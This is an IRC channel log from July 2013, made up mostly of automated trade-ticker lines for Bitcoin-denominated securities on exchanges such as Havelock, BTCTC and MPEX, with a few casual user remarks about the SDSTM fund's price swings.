[+] Jul 12 08:39:30 [HAVELOCK] [AM100] 144 @ 0.0405 = 5.832 BTC [+] Jul 12 08:41:15 [BTCTC] [TAT.VIRTUALMINE] 5 @ 0.004464 = 0.0223 BTC [-] Jul 12 08:41:44 [HAVELOCK] [HIM] 13 @ 0.265 = 3.445 BTC [-] Jul 12 08:42:40 [HAVELOCK] [HIM] 25 @ 0.26 = 6.5 BTC [-] Jul 12 08:43:44 [BTCTC] [RSM] 1 @ 0.013 BTC [+] Jul 12 08:44:03 [HAVELOCK] [SDSTM] 22 @ 0.0085 = 0.187 BTC [+] Jul 12 08:44:05 [BTCTC] [BITVPS] 10 @ 0.002045 = 0.0205 BTC [+] Jul 12 08:44:09 [HAVELOCK] [SDSTM] 30 @ 0.00801 = 0.2403 BTC [-] Jul 12 08:44:34 [HAVELOCK] [SDSTM] 2 @ 0.00800001 = 0.016 BTC [-] Jul 12 08:44:43 [HAVELOCK] [SDSTM] 10 @ 0.008 = 0.08 BTC [-] Jul 12 08:44:47 [HAVELOCK] [SDSTM] 5 @ 0.008 = 0.04 BTC [-] Jul 12 08:45:02 [HAVELOCK] [SDSTM] 300 @ 0.007999 = 2.3997 BTC [-] Jul 12 08:45:22 [HAVELOCK] [SDSTM] 4 @ 0.00779 = 0.0312 BTC [-] Jul 12 08:45:37 [HAVELOCK] [SDSTM] 146 @ 0.00779 = 1.1373 BTC [-] Jul 12 08:45:45 [HAVELOCK] [SDSTM] 1 @ 0.0079 BTC [+] Jul 12 08:45:54 [HAVELOCK] [SDSTM] 15 @ 0.0076 = 0.114 BTC [-] Jul 12 08:46:08 [HAVELOCK] [SDSTM] 1 @ 0.0079 BTC [+] Jul 12 08:46:14 [HAVELOCK] [SDSTM] 106 @ 0.007899 = 0.8373 BTC [-] Jul 12 08:46:39 [HAVELOCK] [AM100] 29 @ 0.0405 = 1.1745 BTC [+] Jul 12 08:46:55 [HAVELOCK] [AM100] 6 @ 0.0405 = 0.243 BTC [+] Jul 12 08:47:49 [HAVELOCK] [AM100] 43 @ 0.0405 = 1.7415 BTC [+] Jul 12 08:47:56 [BTCTC] [B.YABMC] 2 @ 0.0042 = 0.0084 BTC [-] Jul 12 08:48:06 [BTCTC] [TAT.ASICMINER] 13 @ 0.041505 = 0.5396 BTC [-] Jul 12 08:48:24 [HAVELOCK] [SDSTM] 3 @ 0.007899 = 0.0237 BTC [-] Jul 12 08:49:19 [HAVELOCK] [SDSTM] 117 @ 0.00787 = 0.9208 BTC [-] Jul 12 08:49:24 [BTCTC] [TAT.ASICMINER] 5 @ 0.041601 = 0.208 BTC [+] Jul 12 08:49:26 [BTCTC] [TAT.ASICMINER] 10 @ 0.0416 = 0.416 BTC [-] Jul 12 08:49:28 [BTCTC] [TAT.ASICMINER] 48 @ 0.041502 = 1.9921 BTC [-] Jul 12 08:49:29 [BTCTC] [TAT.ASICMINER] 20 @ 0.041501 = 0.83 BTC [-] Jul 12 08:49:30 [HAVELOCK] [KCIM] 1 @ 0.087 BTC [-] Jul 12 08:49:31 [BTCTC] [BFMINES] 3 @ 0.00399 = 0.012 BTC [+] Jul 12 08:49:35 [BTCTC] [TAT.ASICMINER] 10 @ 0.041501 = 0.415 BTC [-] Jul 12 08:50:17 [MPEX] [S.MPOE] 22152 @ 0.00081575 = 18.0705 BTC [-] Jul 12 08:50:44 [HAVELOCK] [AM100] 24 @ 0.041 = 0.984 BTC [+] Jul 12 08:50:57 [BTCTC] [BTC-BOND] 1 @ 0.009996 BTC [+] Jul 12 08:51:00 [HAVELOCK] [SDSTM] 23 @ 0.0077 = 0.1771 BTC [-] Jul 12 08:51:02 [HAVELOCK] [SDSTM] 265 @ 0.0076 = 2.014 BTC [-] Jul 12 08:51:03 [HAVELOCK] [SDSTM] 78 @ 0.0076 = 0.5928 BTC [-] Jul 12 08:51:13 [HAVELOCK] [SDSTM] 11 @ 0.0076 = 0.0836 BTC [-] Jul 12 08:51:14 [HAVELOCK] [SDSTM] 42 @ 0.0076 = 0.3192 BTC [-] Jul 12 08:51:25 [HAVELOCK] [SDSTM] 20 @ 0.00630002 = 0.126 BTC [-] Jul 12 08:51:26 [HAVELOCK] [SDSTM] 50 @ 0.00631 = 0.3155 BTC [+] Jul 12 08:51:39 [HAVELOCK] [SDSTM] 80 @ 0.00630002 = 0.504 BTC [-] Jul 12 08:51:41 [HAVELOCK] [SDSTM] 9 @ 0.00750002 = 0.0675 BTC [+] Jul 12 08:52:01 what's funny is that Havelock issuers pay based on market cap Jul 12 08:52:01 [HAVELOCK] [SDSTM] 14 @ 0.00750002 = 0.105 BTC [+] Jul 12 08:52:14 so this actually hurts the fund itself Jul 12 08:52:23 or at least the issuer Jul 12 08:52:29 [HAVELOCK] [SDSTM] 80 @ 0.00630002 = 0.504 BTC [-] Jul 12 08:52:31 [HAVELOCK] [SDSTM] 150 @ 0.00630001 = 0.945 BTC [-] Jul 12 08:52:32 [HAVELOCK] [SDSTM] 20 @ 0.00621 = 0.1242 BTC [-] Jul 12 08:52:33 [HAVELOCK] [SDSTM] 5 @ 0.00605625 = 0.0303 BTC [-] Jul 12 08:52:34 [HAVELOCK] [SDSTM] 500 @ 0.005002 = 2.501 BTC [-] Jul 12 08:52:35 [HAVELOCK] [SDSTM] 100 @ 0.005001 = 0.5001 BTC [-] Jul 12 08:52:36 [HAVELOCK] [SDSTM] 100 @ 0.0050001 = 0.5 BTC [-] Jul 12 08:52:38 [HAVELOCK] [SDSTM] 45 @ 0.005 = 0.225 BTC [-] Jul 12 08:52:39 [HAVELOCK] [SDSTM] 100 @ 0.0075 = 0.75 BTC [+] Jul 12 08:52:40 [HAVELOCK] [SDSTM] 177 @ 0.00750002 = 1.3275 BTC [+] Jul 12 08:52:41 [HAVELOCK] [SDSTM] 81 @ 0.0076 = 0.6156 BTC [+] Jul 12 08:52:42 [HAVELOCK] [SDSTM] 66 @ 0.00787 = 0.5194 BTC [+] Jul 12 08:52:44 [HAVELOCK] [SDSTM] 1474 @ 0.007899 = 11.6431 BTC [+] Jul 12 08:52:45 [HAVELOCK] [SDSTM] 127 @ 0.0079 = 1.0033 BTC [+] Jul 12 08:53:26 [HAVELOCK] [SDSTM] 100 @ 0.0079 = 0.79 BTC [+] Jul 12 08:54:00 [HAVELOCK] [HIM] 3 @ 0.289777 = 0.8693 BTC [+] Jul 12 08:54:21 [HAVELOCK] [SDSTM] 100 @ 0.0075 = 0.75 BTC [-] Jul 12 08:54:31 [HAVELOCK] [SDSTM] 100 @ 0.00789 = 0.789 BTC [+] Jul 12 08:55:18 [HAVELOCK] [HIM] 7 @ 0.289777 = 2.0284 BTC [+] Jul 12 08:56:01 [HAVELOCK] [SDSTM] 171 @ 0.0079 = 1.3509 BTC [+] Jul 12 08:56:48 [HAVELOCK] [SDSTM] 55 @ 0.008 = 0.44 BTC [+] Jul 12 08:57:10 [HAVELOCK] [SDSTM] 4 @ 0.008 = 0.032 BTC [+] Jul 12 08:59:04 [HAVELOCK] [SDSTM] 1 @ 0.00785 BTC [-] Jul 12 09:00:27 [BTCTC] [TAT.ASICMINER] 29 @ 0.041501 = 1.2035 BTC [-] Jul 12 09:00:43 [HAVELOCK] [AM100] 1 @ 0.0405 BTC [-] Jul 12 09:00:44 [HAVELOCK] [AM100] 3 @ 0.0405 = 0.1215 BTC [-] Jul 12 09:00:45 [HAVELOCK] [AM100] 13 @ 0.040011 = 0.5201 BTC [-] Jul 12 09:00:46 [HAVELOCK] [AM100] 3 @ 0.04001 = 0.12 BTC [-] Jul 12 09:00:47 [HAVELOCK] [AM100] 3 @ 0.04001 = 0.12 BTC [-] Jul 12 09:00:49 [HAVELOCK] [AM100] 4 @ 0.040001 = 0.16 BTC [-] Jul 12 09:00:50 [HAVELOCK] [AM100] 50 @ 0.04000001 = 2 BTC [-] Jul 12 09:00:51 [HAVELOCK] [AM100] 21 @ 0.03999899 = 0.84 BTC [-] Jul 12 09:01:07 [BTCTC] [B.YABMC] 1 @ 0.0042 BTC [-] Jul 12 09:01:11 [HAVELOCK] [SDSTM] 100 @ 0.0056 = 0.56 BTC [-] Jul 12 09:01:11 [HAVELOCK] [SDSTM] 400 @ 0.00550101 = 2.2004 BTC [-] Jul 12 09:01:52 [HAVELOCK] [SDSTM] 527 @ 0.00550101 = 2.899 BTC [-] Jul 12 09:02:05 what is this SDSTM ? Jul 12 09:02:24 [BTCTC] [AMC-PT] 100 @ 0.0025 = 0.25 BTC [+] Jul 12 09:02:29 a new fund run by some unknown guy Jul 12 09:02:57 [HAVELOCK] [SDSTM] 1 @ 0.00785 BTC [+] Jul 12 09:03:40 whats it do? Jul 12 09:05:07 buys stuff for you Jul 12 09:07:06 lol, a fund with a total value of 100 btc Jul 12 09:08:07 [HAVELOCK] [SDSTM] 1 @ 0.0074 BTC [-] Jul 12 09:08:10 [HAVELOCK] [SDSTM] 1 @ 0.0074 BTC [-] Jul 12 09:09:04 [BTCTC] [TAT.ASICMINER] 25 @ 0.042699 = 1.0675 BTC [+] Jul 12 09:09:11 [BTCTC] [AMC-PT] 12 @ 0.0025 = 0.03 BTC [+] Jul 12 09:10:17 [BTCTC] [COG.F] 1 @ 4.98 BTC [+] Jul 12 09:10:20 [HAVELOCK] [AM100] 19 @ 0.040997 = 0.7789 BTC [+] Jul 12 09:10:21 [HAVELOCK] [AM100] 13 @ 0.040998 = 0.533 BTC [+] Jul 12 09:10:23 [HAVELOCK] [AM100] 3 @ 0.04099999 = 0.123 BTC [+] Jul 12 09:10:24 [HAVELOCK] [AM100] 55 @ 0.041 = 2.255 BTC [+] Jul 12 09:10:25 [HAVELOCK] [AM100] 110 @ 0.041 = 4.51 BTC [+] Jul 12 09:10:26 thatll get them like 20 AM shares Jul 12 09:10:27 [HAVELOCK] [SDSTM] 2 @ 0.007398 = 0.0148 BTC [-] Jul 12 09:10:39 prorfit Jul 12 09:10:45 [BTCTC] [COG.F] 2 @ 4.999 = 9.998 BTC [+] Jul 12 09:11:19 [BTCTC] [COG.F] 1 @ 5.05 BTC [+] Jul 12 09:11:36 [HAVELOCK] [SDSTM] 2 @ 0.0072 = 0.0144 BTC [-] Jul 12 09:14:20 [HAVELOCK] [SDSTM] 35 @ 0.006 = 0.21 BTC [-] Jul 12 09:14:22 [HAVELOCK] [SDSTM] 50 @ 0.00571101 = 0.2856 BTC [-] Jul 12 09:14:23 [HAVELOCK] [SDSTM] 213 @ 0.005711 = 1.2164 BTC [-] Jul 12 09:14:49 [HAVELOCK] [AM100] 6 @ 0.039205 = 0.2352 BTC [-] Jul 12 09:16:39 [HAVELOCK] [AM100] 4 @ 0.040999 = 0.164 BTC [+] Jul 12 09:16:54 [HAVELOCK] [SDSTM] 36 @ 0.0065 = 0.234 BTC [+] Jul 12 09:16:56 [HAVELOCK] [SDSTM] 48 @ 0.0065 = 0.312 BTC [+] Jul 12 09:17:16 [HAVELOCK] [SDSTM] 34 @ 0.0069 = 0.2346 BTC [+] Jul 12 09:17:28 [BTCTC] [RSM] 10 @ 0.013 = 0.13 BTC [+] Jul 12 09:17:45 [HAVELOCK] [SDSTM] 268 @ 0.0069 = 1.8492 BTC [+] Jul 12 09:18:07 [BTCTC] [S.DICE-PT] 4 @ 0.002382 = 0.0095 BTC [+] Jul 12 09:18:17 [HAVELOCK] [SDSTM] 4 @ 0.00719 = 0.0288 BTC [+] Jul 12 09:18:27 [HAVELOCK] [AM100] 15 @ 0.040999 = 0.615 BTC [+] Jul 12 09:18:34 [HAVELOCK] [AM100] 5 @ 0.040999 = 0.205 BTC [+] Jul 12 09:18:36 [HAVELOCK] [AM100] 70 @ 0.039301 = 2.7511 BTC [-] Jul 12 09:18:51 [HAVELOCK] [AM100] 143 @ 0.039301 = 5.62 BTC [-] Jul 12 09:19:54 [HAVELOCK] [SDSTM] 96 @ 0.00719 = 0.6902 BTC [+] Jul 12 09:20:29 [HAVELOCK] [SDSTM] 48 @ 0.00719 = 0.3451 BTC [+] Jul 12 09:20:33 [HAVELOCK] [SDSTM] 100 @ 0.00738 = 0.738 BTC [+] Jul 12 09:20:52 [HAVELOCK] [SDSTM] 1068 @ 0.007397 = 7.9 BTC [+] Jul 12 09:20:54 [BTCTC] [BASIC-MINING] 1 @ 0.401701 BTC [-] Jul 12 09:21:05 [BTCTC] [DMS.MINING] 5 @ 0.01475 = 0.0738 BTC [-] Jul 12 09:21:38 [HAVELOCK] [SDICE] 1 @ 0.2023 BTC [+] Jul 12 09:22:52 [HAVELOCK] [SDSTM] 72 @ 0.007397 = 0.5326 BTC [+] Jul 12 09:23:45 [HAVELOCK] [SDSTM] 198 @ 0.007398 = 1.4648 BTC [+] Jul 12 09:23:52 you mean plolfit. Jul 12 09:24:00 [BTCTC] [BASIC-MINING] 10 @ 0.419996 = 4.2 BTC [+] Jul 12 09:25:54 [BTCTC] [TAT.ASICMINER] 1 @ 0.042694 BTC [-] Jul 12 09:25:58 [HAVELOCK] [SDSTM] 98 @ 0.0078 = 0.7644 BTC [+] Jul 12 09:26:17 [HAVELOCK] [SDSTM] 2 @ 0.0078 = 0.0156 BTC [+] Jul 12 09:27:55 [BTCTC] [AMC-PT] 10 @ 0.0025 = 0.025 BTC [+] Jul 12 09:28:34 [HAVELOCK] [HIM] 2 @ 0.261 = 0.522 BTC [-] Jul 12 09:29:11 [BTCTC] [ASICMINER-PT] 1 @ 4.3 BTC [+] Jul 12 09:29:26 [HAVELOCK] [AM100] 15 @ 0.04055 = 0.6083 BTC [+] Jul 12 09:29:37 [HAVELOCK] [HIM] 2 @ 0.26000101 = 0.52 BTC [-] Jul 12 09:29:57 [HAVELOCK] [AM100] 1 @ 0.04055 BTC [+] Jul 12 09:30:17 [HAVELOCK] [HIM] 5 @ 0.26000001 = 1.3 BTC [-] Jul 12 09:30:34 [HAVELOCK] [SDSTM] 2 @ 0.0078 = 0.0156 BTC [+] Jul 12 09:30:45 [HAVELOCK] [VTX] 1 @ 0.85 BTC [+] Jul 12 09:31:06 [HAVELOCK] [SDSTM] 1 @ 0.0078 BTC [+] Jul 12 09:31:09 [HAVELOCK] [HIM] 8 @ 0.26 = 2.08 BTC [-] Jul 12 09:31:35 [HAVELOCK] [SDSTM] 4 @ 0.0078 = 0.0312 BTC [+] Jul 12 09:31:36 [HAVELOCK] [SDSTM] 93 @ 0.0078 = 0.7254 BTC [+] Jul 12 09:31:45 [HAVELOCK] [SDSTM] 4 @ 0.0078 = 0.0312 BTC [+] Jul 12 09:31:48 [HAVELOCK] [SDSTM] 35 @ 0.0078 = 0.273 BTC [+] Jul 12 09:31:50 [HAVELOCK] [SDSTM] 331 @ 0.00785 = 2.5984 BTC [+] Jul 12 09:31:52 [HAVELOCK] [AM1] 1 @ 4.395 BTC [-] Jul 12 09:32:00 [HAVELOCK] [SDSTM] 35 @ 0.00785 = 0.2748 BTC [+] Jul 12 09:33:02 [HAVELOCK] [SDSTM] 41 @ 0.008 = 0.328 BTC [+] Jul 12 09:33:45 [HAVELOCK] [SDSTM] 100 @ 0.0081 = 0.81 BTC [+] Jul 12 09:34:30 [HAVELOCK] [SDSTM] 2 @ 0.0085 = 0.017 BTC [+] Jul 12 09:36:10 [HAVELOCK] [AM100] 130 @ 0.039313 = 5.1107 BTC [-] Jul 12 09:39:30 [HAVELOCK] [SDSTM] 50 @ 0.00869 = 0.4345 BTC [+] Jul 12 09:39:48 [HAVELOCK] [SDSTM] 100 @ 0.009 = 0.9 BTC [+] Jul 12 09:40:06 [HAVELOCK] [SDSTM] 174 @ 0.009 = 1.566 BTC [+] Jul 12 09:40:10 [HAVELOCK] [SDSTM] 100 @ 0.01 = 1 BTC [+] Jul 12 09:41:17 [HAVELOCK] [AM100] 6 @ 0.040549 = 0.2433 BTC [+] Jul 12 09:41:45 [HAVELOCK] [SDSTM] 3 @ 0.0135 = 0.0405 BTC [+] Jul 12 09:42:35 [HAVELOCK] [SDSTM] 1 @ 0.0135 BTC [+] Jul 12 09:43:59 [HAVELOCK] [SDSTM] 50 @ 0.01349 = 0.6745 BTC [-] Jul 12 09:44:30 [HAVELOCK] [SDSTM] 100 @ 0.01349 = 1.349 BTC [-] Jul 12 09:44:46 [HAVELOCK] [VTX] 1 @ 0.85 BTC [+] Jul 12 09:44:52 [HAVELOCK] [SDSTM] 70 @ 0.0135 = 0.945 BTC [+] Jul 12 09:46:20 [HAVELOCK] [SDSTM] 30 @ 0.013 = 0.39 BTC [-] Jul 12 09:46:28 [HAVELOCK] [SDSTM] 40 @ 0.013 = 0.52 BTC [-] Jul 12 09:46:47 [HAVELOCK] [SDSTM] 6 @ 0.013 = 0.078 BTC [-] **** BEGIN LOGGING AT Fri Jul 12 17:06:32 2013 Jul 12 17:07:10 [BTCTC] [S.MPOE-PT] 5 @ 0.000944 = 0.0047 BTC [-] Jul 12 17:08:48 [BTCTC] [COGNITIVE] 4 @ 0.450002 = 1.8 BTC [-] Jul 12 17:08:52 [BTCTC] [COGNITIVE] 1 @ 0.450001 BTC [-] Jul 12 17:08:54 [BTCTC] [COGNITIVE] 1 @ 0.45 BTC [-] Jul 12 17:08:56 [BTCTC] [COGNITIVE] 1 @ 0.447991 BTC [-] Jul 12 17:08:57 [BTCTC] [COGNITIVE] 10 @ 0.432 = 4.32 BTC [-] Jul 12 17:08:59 [BTCTC] [COGNITIVE] 5 @ 0.431 = 2.155 BTC [-] Jul 12 17:09:00 [BTCTC] [COGNITIVE] 10 @ 0.43 = 4.3 BTC [-] Jul 12 17:09:33 [HAVELOCK] [AM100] 13 @ 0.04 = 0.52 BTC [-] Jul 12 17:09:39 [HAVELOCK] [SDSTM] 1 @ 0.01239999 BTC [-] Jul 12 17:11:14 [HAVELOCK] [SDSTM] 34 @ 0.01239999 = 0.4216 BTC [-] Jul 12 17:11:45 [BTCTC] [BASIC-MINING] 10 @ 0.473499 = 4.735 BTC [+] Jul 12 17:11:48 [BTCTC] [BASIC-MINING] 1 @ 0.474 BTC [+] Jul 12 17:11:48 [BTCTC] [BASIC-MINING] 4 @ 0.484998 = 1.94 BTC [+] Jul 12 17:11:50 [BTCTC] [BASIC-MINING] 3 @ 0.484999 = 1.455 BTC [+] Jul 12 17:11:51 [BTCTC] [BASIC-MINING] 5 @ 0.485 = 2.425 BTC [+] Jul 12 17:11:52 [BTCTC] [BASIC-MINING] 1 @ 0.499998 BTC [+] Jul 12 17:11:53 [BTCTC] [BASIC-MINING] 10 @ 0.499999 = 5 BTC [+] Jul 12 17:11:55 [BTCTC] [BASIC-MINING] 10 @ 0.5 = 5 BTC [+] Jul 12 17:11:56 [BTCTC] [BASIC-MINING] 40 @ 0.5 = 20 BTC [+] Jul 12 17:11:58 [HAVELOCK] [AM100] 247 @ 0.04 = 9.88 BTC [-] Jul 12 17:12:52 [BTCTC] [TAT.ASICMINER] 16 @ 0.041401 = 0.6624 BTC [+] Jul 12 17:12:54 [BTCTC] [TAT.ASICMINER] 33 @ 0.0414 = 1.3662 BTC [-] Jul 12 17:13:26 [BTCTC] [TAT.ASICMINER] 51 @ 0.0413 = 2.1063 BTC [-] Jul 12 17:13:43 [HAVELOCK] [SDSTM] 2 @ 0.0124 = 0.0248 BTC [+] Jul 12 17:14:16 [HAVELOCK] [SDSTM] 18 @ 0.0124 = 0.2232 BTC [+] Jul 12 17:14:25 [HAVELOCK] [SDSTM] 178 @ 0.0124 = 2.2072 BTC [+] Jul 12 17:14:35 [HAVELOCK] [SDSTM] 1 @ 0.0146 BTC [+] Jul 12 17:14:52 [HAVELOCK] [SDSTM] 10 @ 0.0148 = 0.148 BTC [+] Jul 12 17:15:11 [HAVELOCK] [SDSTM] 280 @ 0.01589 = 4.4492 BTC [+] Jul 12 17:15:22 [HAVELOCK] [SDSTM] 30 @ 0.0159 = 0.477 BTC [+] Jul 12 17:15:49 [BTCTC] [ASICMINER-PT] 1 @ 4.3 BTC [+] Jul 12 17:16:02 [HAVELOCK] [AM100] 5 @ 0.040399 = 0.202 BTC [+] Jul 12 17:16:04 [HAVELOCK] [SDSTM] 130 @ 0.016 = 2.08 BTC [+] Jul 12 17:16:27 [HAVELOCK] [AM100] 20 @ 0.040399 = 0.808 BTC [+] Jul 12 17:17:11 [HAVELOCK] [SDSTM] 10 @ 0.0156 = 0.156 BTC [-] Jul 12 17:17:23 [HAVELOCK] [AM100] 5 @ 0.040399 = 0.202 BTC [+] Jul 12 17:19:14 [BTCTC] [COGNITIVE] 2 @ 0.410005 = 0.82 BTC [-] Jul 12 17:19:16 [BTCTC] [COGNITIVE] 1 @ 0.410004 BTC [-] Jul 12 17:19:18 [HAVELOCK] [SDSTM] 5 @ 0.0154 = 0.077 BTC [-] Jul 12 17:19:28 [BTCTC] [COGNITIVE] 1 @ 0.410002 BTC [-] Jul 12 17:19:30 [BTCTC] [COGNITIVE] 20 @ 0.41 = 8.2 BTC [-] Jul 12 17:19:31 [BTCTC] [COGNITIVE] 3 @ 0.4 = 1.2 BTC [-] Jul 12 17:19:36 [HAVELOCK] [SDSTM] 8 @ 0.015 = 0.12 BTC [-] Jul 12 17:21:16 [HAVELOCK] [AM100] 68 @ 0.040399 = 2.7471 BTC [+] Jul 12 17:25:53 [BTCTC] [TAT.ASICMINER] 10 @ 0.041301 = 0.413 BTC [+] Jul 12 17:26:05 [BTCTC] [B.YABMC] 1 @ 0.004499 BTC [+] Jul 12 17:27:22 [BTCTC] [BASIC-MINING] 1 @ 0.484 BTC [-] Jul 12 17:27:23 [BTCTC] [BASIC-MINING] 3 @ 0.484999 = 1.455 BTC [+] Jul 12 17:29:45 [BTCTC] [DMS.SELLING] 1 @ 0.034678 BTC [+] Jul 12 17:29:47 [BTCTC] [DMS.SELLING] 20 @ 0.034678 = 0.6936 BTC [+] Jul 12 17:30:13 [BTCTC] [TAT.ASICMINER] 11 @ 0.041303 = 0.4543 BTC [+] Jul 12 17:31:10 [BTCTC] [DMS.SELLING] 7 @ 0.034679 = 0.2428 BTC [+] Jul 12 17:31:48 [HAVELOCK] [SDSTM] 16 @ 0.01499 = 0.2398 BTC [-] Jul 12 17:33:32 [BTCTC] [RSM] 2 @ 0.014479 = 0.029 BTC [+] Jul 12 17:33:53 [BTCTC] [BITVPS] 10 @ 0.001891 = 0.0189 BTC [-] Jul 12 17:35:01 [BTCTC] [BASIC-MINING] 7 @ 0.484999 = 3.395 BTC [+] Jul 12 17:35:03 [BTCTC] [BASIC-MINING] 4 @ 0.49 = 1.96 BTC [+] Jul 12 17:35:15 [BTCTC] [BASIC-MINING] 5 @ 0.5 = 2.5 BTC [+] Jul 12 17:35:17 [BTCTC] [BASIC-MINING] 32 @ 0.5 = 16 BTC [+] Jul 12 17:35:52 [BTCTC] [S.DICE-PT] 3 @ 0.002379 = 0.0071 BTC [+] Jul 12 17:36:48 [BTCTC] [BASIC-MINING] 1 @ 0.499999 BTC [-] Jul 12 17:37:22 [BTCTC] [DMS.MINING] 8 @ 0.015 = 0.12 BTC [-] Jul 12 17:37:24 [BTCTC] [DMS.MINING] 10 @ 0.0149 = 0.149 BTC [-] Jul 12 17:37:26 [BTCTC] [DMS.MINING] 10 @ 0.0148 = 0.148 BTC [-] Jul 12 17:37:28 [BTCTC] [DMS.MINING] 10 @ 0.0147 = 0.147 BTC [-] Jul 12 17:37:29 [BTCTC] [DMS.MINING] 10 @ 0.0146 = 0.146 BTC [-] Jul 12 17:37:31 [BTCTC] [DMS.MINING] 5 @ 0.0145 = 0.0725 BTC [-] Jul 12 17:38:24 [BTCTC] [BASIC-MINING] 10 @ 0.499998 = 5 BTC [-] Jul 12 17:39:17 [BTCTC] [S.MPOE-PT] 1 @ 0.000942 BTC [-] Jul 12 17:39:24 [BTCTC] [DMS.SELLING] 1 @ 0.034679 BTC [+] Jul 12 17:42:45 [HAVELOCK] [AM100] 10 @ 0.04 = 0.4 BTC [-] Jul 12 17:43:30 [HAVELOCK] [SDSTM] 24 @ 0.01499 = 0.3598 BTC [-] Jul 12 17:44:25 [BTCTC] [ASICMINER-PT] 1 @ 4.309999 BTC [+] Jul 12 17:44:40 [HAVELOCK] [SDSTM] 1 @ 0.015 BTC [+] Jul 12 17:46:21 [BTCTC] [BASIC-MINING] 1 @ 0.499999 BTC [+] Jul 12 17:48:44 [MPEX] [S.MPOE] 1772 @ 0.00081959 = 1.4523 BTC [+] Jul 12 17:48:59 [MPEX] [S.MPOE] 5321 @ 0.0008196 = 4.3611 BTC [+] Jul 12 17:49:01 [MPEX] [S.MPOE] 15000 @ 0.00082 = 12.3 BTC [+] Jul 12 17:49:03 [MPEX] [S.MPOE] 757 @ 0.00082019 = 0.6209 BTC [+] Jul 12 17:50:01 [HAVELOCK] [KCIM] 1 @ 0.9 BTC [+] Jul 12 17:50:14 [BTCTC] [DMS.PURCHASE] 105 @ 0.048759 = 5.1197 BTC [+] Jul 12 17:51:45 [BTCTC] [BASIC-MINING] 1 @ 0.499999 BTC [+] Jul 12 17:52:26 [HAVELOCK] [AM100] 30 @ 0.0408 = 1.224 BTC [+] Jul 12 17:53:36 [HAVELOCK] [AM100] 1 @ 0.0408 BTC [+] Jul 12 17:53:37 [HAVELOCK] [AM100] 1 @ 0.0408 BTC [+] Jul 12 17:54:04 [HAVELOCK] [VTX] 14 @ 0.8403076 = 11.7643 BTC [-] Jul 12 17:54:05 [HAVELOCK] [VTX] 3 @ 0.8403066 = 2.5209 BTC [-] Jul 12 17:54:07 [HAVELOCK] [VTX] 5 @ 0.831 = 4.155 BTC [-] Jul 12 17:57:42 [HAVELOCK] [SDSTM] 14 @ 0.0153 = 0.2142 BTC [+] Jul 12 17:58:57 [BTCTC] [BASIC-MINING] 7 @ 0.499999 = 3.5 BTC [+] Jul 12 17:58:59 [BTCTC] [BASIC-MINING] 15 @ 0.5 = 7.5 BTC [+] Jul 12 17:59:21 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.004147 BTC [+] Jul 12 17:59:46 [BTCTC] [BTC-TRADING-PT] 3 @ 0.76 = 2.28 BTC [-] Jul 12 17:59:48 [BTCTC] [BTC-TRADING-PT] 5 @ 0.76 = 3.8 BTC [-] Jul 12 18:00:02 [BTCTC] [DMS.MINING] 9 @ 0.0152 = 0.1368 BTC [+] Jul 12 18:00:19 [BTCTC] [DMS.MINING] 106 @ 0.0152 = 1.6112 BTC [+] Jul 12 18:01:18 [BTCTC] [BASIC-MINING] 2 @ 0.5 = 1 BTC [+] Jul 12 18:02:00 [BTCTC] [AMC-PT] 26 @ 0.002499 = 0.065 BTC [+] Jul 12 18:02:02 [BTCTC] [AMC-PT] 17974 @ 0.0025 = 44.935 BTC [+] Jul 12 18:03:12 [BTCTC] [BASIC-MINING] 1 @ 0.5 BTC [+] Jul 12 18:03:14 [BTCTC] [BASIC-MINING] 2 @ 0.5 = 1 BTC [+] Jul 12 18:03:15 [BTCTC] [BASIC-MINING] 10 @ 0.5 = 5 BTC [+] Jul 12 18:03:17 [BTCTC] [BASIC-MINING] 1 @ 0.5 BTC [+] Jul 12 18:03:18 [BTCTC] [BASIC-MINING] 8 @ 0.5 = 4 BTC [+] Jul 12 18:03:57 [BTCTC] [AMC-PT] 1000 @ 0.0025 = 2.5 BTC [+] Jul 12 18:04:25 [BTCTC] [BASIC-MINING] 2 @ 0.5 = 1 BTC [+] Jul 12 18:04:51 [BTCTC] [BASIC-MINING] 10 @ 0.485001 = 4.85 BTC [-] Jul 12 18:04:53 [BTCTC] [BASIC-MINING] 7 @ 0.485 = 3.395 BTC [-] Jul 12 18:04:54 [BTCTC] [BASIC-MINING] 3 @ 0.45 = 1.35 BTC [-] Jul 12 18:06:01 [BTCTC] [DMS.SELLING] 20 @ 0.034678 = 0.6936 BTC [-] Jul 12 18:06:03 [BTCTC] [DMS.SELLING] 81 @ 0.034679 = 2.809 BTC [+] Jul 12 18:06:07 [BTCTC] [DMS.SELLING] 6 @ 0.03468 = 0.2081 BTC [+] Jul 12 18:06:09 [BTCTC] [DMS.SELLING] 20 @ 0.03468 = 0.6936 BTC [+] Jul 12 18:06:10 [BTCTC] [DMS.SELLING] 60 @ 0.03469 = 2.0814 BTC [+] Jul 12 18:06:12 [BTCTC] [DMS.SELLING] 100 @ 0.03485 = 3.485 BTC [+] Jul 12 18:06:13 [BTCTC] [DMS.SELLING] 100 @ 0.03486 = 3.486 BTC [+] Jul 12 18:06:15 [BTCTC] [DMS.SELLING] 13 @ 0.0349 = 0.4537 BTC [+] Jul 12 18:06:54 [BTCTC] [ASICMINER-PT] 1 @ 4.269001 BTC [-] Jul 12 18:08:14 [BTCTC] [TAT.ASICMINER] 13 @ 0.042484 = 0.5523 BTC [+] Jul 12 18:08:15 [BTCTC] [TAT.ASICMINER] 50 @ 0.042485 = 2.1243 BTC [+] Jul 12 18:08:17 [BTCTC] [TAT.ASICMINER] 23 @ 0.042487 = 0.9772 BTC [+] Jul 12 18:08:19 [BTCTC] [TAT.ASICMINER] 10 @ 0.042589 = 0.4259 BTC [+] Jul 12 18:08:20 [BTCTC] [TAT.ASICMINER] 4 @ 0.04259 = 0.1704 BTC [+] Jul 12 18:09:00 [BTCTC] [DMS.MINING] 3 @ 0.0158 = 0.0474 BTC [+] Jul 12 18:09:30 [MPEX] [S.MPOE] 14612 @ 0.00082019 = 11.9846 BTC [+] Jul 12 18:09:32 [MPEX] [S.MPOE] 23246 @ 0.00082022 = 19.0668 BTC [+] Jul 12 18:12:34 [HAVELOCK] [SDICE] 2 @ 0.202301 = 0.4046 BTC [+] Jul 12 18:12:54 [BTCTC] [ASICMINER-PT] 1 @ 4.269 BTC [-] Jul 12 18:15:01 [HAVELOCK] [SDICE] 4 @ 0.205 = 0.82 BTC [+] Jul 12 18:15:52 [BTCTC] [DMS.MINING] 112 @ 0.0158 = 1.7696 BTC [+] Jul 12 18:16:56 [BTCTC] [AMC-PT] 399 @ 0.0025 = 0.9975 